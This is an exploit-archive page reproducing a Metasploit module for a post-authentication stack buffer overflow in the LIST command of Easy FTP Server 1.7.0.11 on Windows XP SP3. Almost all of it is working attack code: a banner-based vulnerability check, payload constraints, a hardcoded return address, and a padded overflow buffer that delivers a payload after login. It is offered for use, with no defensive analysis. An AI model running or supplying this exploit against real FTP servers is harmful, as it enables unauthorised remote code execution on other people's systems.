Easy FTP Server v1.7.0.11 LIST Command Remote BoF Exploit (P

Posted on 23 July 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Easy FTP Server v1.7.0.11 LIST Command Remote BoF Exploit (Post Auth)</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>==============================================================================
Easy FTP Server v1.7.0.11 LIST Command Remote BoF Exploit (Post Auth) - (meta)
==============================================================================


##
# EDB-ID: 14400
# Date : July 5, 2010
# Discovered by : Karn Ganeshen
# Version : 1.7.0.11
# Tested on : Windows XP SP3 Version 2002
# MFR  &amp; VAS TEAM : just testing howto convert exploits to metasploit modules.
##
 
require 'msf/core'
 
class Metasploit3 &lt; Msf::Exploit::Remote
    Rank = GreatRanking
 
    include Msf::Exploit::Remote::Ftp
 
    def initialize(info = {})
        super(update_info(info,
            'Name'           =&gt; 'EasyFTP Server &lt;= 1.7.0.11 LIST Command Stack Buffer Overflow',
            'Description'    =&gt; %q{
                    This module exploits a stack-based buffer overflow in EasyFTP Server 1.7.0.11.
                    credit goes to Karn Ganeshan.  
            },
            'Author'         =&gt;
                [
                    'Karn Ganeshan &lt;karnganeshan [at] gmail.com&gt;', # original version
                    'MFR' # convert to metasploit format.
                ],
            'License'        =&gt; MSF_LICENSE,
            'Version'        =&gt; 'Version: 1',
            'References'     =&gt;
                [
                    [ 'EDB', '14400' ],
                ],
            'DefaultOptions' =&gt;
                {
                    'EXITFUNC' =&gt; 'thread'
                },
            'Privileged'     =&gt; false,
            'Payload'        =&gt;
                {
                    'Space'    =&gt; 268,
                    'BadChars' =&gt; &quot;x00x0ax0dx2fx5c&quot;,
                    'DisableNops' =&gt; false
                },
            'Platform'   =&gt; 'win',
            'Targets'        =&gt;
                [
                    [ 'Windows XP SP3 - Version 2002',   { 'Ret' =&gt; 0x7e49732b } ],
                ],
            'DisclosureDate' =&gt; 'July 5 2010',
            'DefaultTarget' =&gt; 0))
    end
 
    def check
        connect
        disconnect
 
        if (banner =~ /BigFoolCat/)
            return Exploit::CheckCode::Vulnerable
        end
            return Exploit::CheckCode::Safe
    end
 
    def exploit
        connect_login
 
        buf = ''
        buf &lt;&lt; make_nops(268 - payload.encoded.length - 4)
        print_status(&quot;Adding the payload...&quot;)
        buf &lt;&lt; payload.encoded
        buf &lt;&lt; [target.ret].pack('V')
 
        print_status(&quot;Sending exploit buffer...&quot;)
        send_cmd( ['LIST', buf] , false)
 
        handler
        disconnect
    end
 
end


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-07-23]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
TOP
Malware :

Last 20
Exploits :

Last 20